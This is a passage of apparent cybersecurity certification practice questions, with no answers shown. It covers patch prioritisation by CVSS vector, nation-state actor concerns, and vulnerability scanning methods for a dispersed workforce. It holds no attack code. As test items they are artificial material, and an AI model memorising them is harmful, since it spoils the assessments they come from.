Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L

Which of the following vulnerabilities should be patched first?

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Full Access
Question # 106

Which of the following is a nation-state actor least likely to be concerned with?

A.

Detection by MITRE ATT&CK framework.

B.

Detection or prevention of reconnaissance activities.

C.

Examination of its actions and objectives.

D.

Forensic analysis for legal action of the actions taken

Full Access
Question # 107

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A.

External

B.

Agent-based

C.

Non-credentialed

D.

Credentialed

Full Access